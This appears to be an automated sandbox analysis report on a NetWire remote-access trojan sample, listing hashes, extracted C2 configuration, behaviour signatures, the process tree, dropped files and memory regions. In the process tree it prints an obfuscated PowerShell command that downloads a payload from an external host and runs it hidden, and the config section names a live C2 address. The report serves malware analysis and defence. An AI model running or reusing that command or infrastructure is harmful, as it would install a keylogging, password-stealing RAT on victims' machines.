Overview

overview

10

Static

static

3

A2AE35821B...51.exe

windows7-x64

10

A2AE35821B...51.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 23:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe

  • Size

    17.7MB

  • MD5

    a5b839089ce5953f0ea149c5d9fa2d7a

  • SHA1

    767b6cea8c1c3f892cc2bf20d1a63e52c0376c39

  • SHA256

    a2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051

  • SHA512

    0df01ca9702f52c8f41809a609d409da6f07f257ae05f6b379378213f1ce18ec00406fc8cc798b7cdf75c63ef763b973f57776bd7ed5d7ccf2457d486a1cdb3e

  • SSDEEP

    393216:iaB19LrFHgq7Pck/UibjnYPj77lYaDnHcqEhgAD:TPFHgKUk//rYPpYGHlqgm

Score
10/10
netwirebotnetdiscoveryexecutionratstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.top4top.io/m_1891i29ay1.mp4

Extracted

Family

netwire

C2

alice2019.myftp.biz:3360

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    FRAPPE2021

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 2 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Netwire family
    netwire
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe
    "C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4516
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:388
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB6C.tmp" "c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\CSC83F488A2222F4D8693308119E85DC552.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3704
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2180
    • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
      "C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:3436

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
    Filesize

    18.0MB

    MD5

    8bbbcc401fc4d9834fa52d9cc98f9eef

    SHA1

    1aa753b405587c17852bcc447e39c6880498c5c0

    SHA256

    c74c692354f9fc75e9cadf7c9d00756d40b5e6d100bb321260e2c29f7d13abb9

    SHA512

    f3450fec6f4ae1cf3e22db11f5be2aa681a908de4bdfadcbd7fc0a08640e0c2fb9e40d607155f575cb4727b64f6dbb433fedaec67e117636cfaa6d8fcfd48ada

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    ba9b2b48e4fb6e97813ab1f6b7e40f35

    SHA1

    d95dea723f5d67ece22adbc9ee6870e2347ffe58

    SHA256

    049366620ca23380cc1b3dba652487ca1b4611c646f30d0a6b456eef22d2f401

    SHA512

    df0d6c3989132f25a40559002b9d620fff26f3d0b2bfae175b88fb2edea3d4796335e88da0ee9bd13d1e7b4de4b12b96e1e1c185441d27774b2d314d4bb979b6

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    476B

    MD5

    b76376bed8ad47d2d9d8ed74918b398b

    SHA1

    81425c1404c4ed19fb2f03c6e0a535490281cd1f

    SHA256

    59423ae50a9d3b477f9b57b95baa7d9384acdf03c07b1497eeef2e950ccd7804

    SHA512

    9f9b623153471974ce781d66683ddda235beea82f506d54db358638aaac355442048a330ba6381572261102037311a59f8a1e15aab6d0da56865f3420cc21ae2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp
    Filesize

    1.5MB

    MD5

    63cbbef120a1f96e3586bffb970f44df

    SHA1

    c354224093c565f009f373fceac05ec89f34c902

    SHA256

    e99f7980cdb90e8365bdd66a1f889ed7c4c8858600861006d9b5d139b90ab020

    SHA512

    8b14df69399e00e384103c9b23d2868191b2e8576b0f24e927e334ca97cc31142d62e333d9776e5bae9e851a53dc6bb910090663abb4fae9b37f0e38a545877a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RESDB6C.tmp
    Filesize

    1KB

    MD5

    9bf898b6679dd9a5686526a6407c421c

    SHA1

    2d7cf6355a0308874a22ce51f3290751381c25f6

    SHA256

    8040ed22df2ab86d10e9350494a9e2b8c257ee9c105109622d0994bca67ad8e0

    SHA512

    fbee29fdb686eb8e1604e2acce8f1cd64947b3fde14b9428ce4921e6ca4b805677316dc5fa62db7653b19dbe2995605b8ba3425dcc930e1b72f378553c45b7ff

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
    Filesize

    232KB

    MD5

    7e9a5c74501529c97a0675dc7d3e36cc

    SHA1

    c090ead740db008ed6bb1832c31065911103e349

    SHA256

    c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157

    SHA512

    81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sccelnx5.qez.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.dll
    Filesize

    13KB

    MD5

    e4e71130076a57121244348fb132704f

    SHA1

    ce698afe1eb6d9566e311d7483b43bb57ecb28ee

    SHA256

    4f0000b706b784c6a03bb320ef28ec7517e1e5aeb390735c6c606fb1bc4ef5b5

    SHA512

    4487fdefc6a78cae532fc67593ae7c8ff9f946cabeaff68b73689588b455b6495d14c7f38947dc1a24ef1f49294f9547953e90f1d0fec91f9f8f493c6d8b62a4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs
    Filesize

    153KB

    MD5

    2591c7f4c1ebca785ccb7c074f66782a

    SHA1

    080fa10f63666f48ed0136eb6dfbe5b914292668

    SHA256

    d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec

    SHA512

    658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\CSC83F488A2222F4D8693308119E85DC552.TMP
    Filesize

    652B

    MD5

    b7ac28a6c17c32b509a5458e1cb8e5e4

    SHA1

    a9de9ce5d0a128da4eb3233bc91349e8f421ad47

    SHA256

    2ef3c7012a138196ef57435928525c79f475fd594c407aa38c827da241ab3c95

    SHA512

    093438d4b7c40ff8b25a357b57bec4f5c3eeb9211b60047d993847cce439f4a659d54f85d0343bf0a8fe7bec843effbc2c560c959c084f36f3f5a0935fe99341

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.0.cs
    Filesize

    13KB

    MD5

    e03b1e7ba7f1a53a7e10c0fd9049f437

    SHA1

    3bb851a42717eeb588eb7deadfcd04c571c15f41

    SHA256

    3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

    SHA512

    a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.cmdline
    Filesize

    327B

    MD5

    fc221f9d940652322cbd180766139516

    SHA1

    b191611ef224d0029cb3f1710f3a1856251b597d

    SHA256

    7c8f12df9e0fb4709f9157e9ce02b79dae285233642762ab63d2768315790762

    SHA512

    436e4f8b3eb532eba28bcb6037520e03765605697ec6d107fdb9fef27efeb12337a4adc936acc385ba5c05d91bec437639b50f79e54abaeb9b622e32a37eb86f

    Download Submit

  • memory/1300-48-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1300-60-0x00000000057B0000-0x0000000005B04000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1300-62-0x0000000005CC0000-0x0000000005D0C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1300-63-0x00000000074E0000-0x0000000007B5A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1300-64-0x0000000006190000-0x00000000061AA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1300-65-0x0000000006D20000-0x0000000006DBC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/1300-61-0x0000000005C70000-0x0000000005C8E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1300-68-0x00000000728EE000-0x00000000728EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1300-69-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1300-40-0x0000000002350000-0x0000000002386000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1300-106-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1300-38-0x00000000728EE000-0x00000000728EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1300-49-0x00000000055D0000-0x0000000005636000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1300-50-0x0000000005640000-0x00000000056A6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1300-43-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1300-41-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1300-42-0x0000000004FA0000-0x00000000055C8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2180-100-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/2180-99-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/4000-67-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4516-97-0x00000000072C0000-0x00000000072CA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4516-81-0x0000000007430000-0x00000000074A6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4516-80-0x0000000007FC0000-0x0000000008564000-memory.dmp

    Filesize

    5.6MB

    Download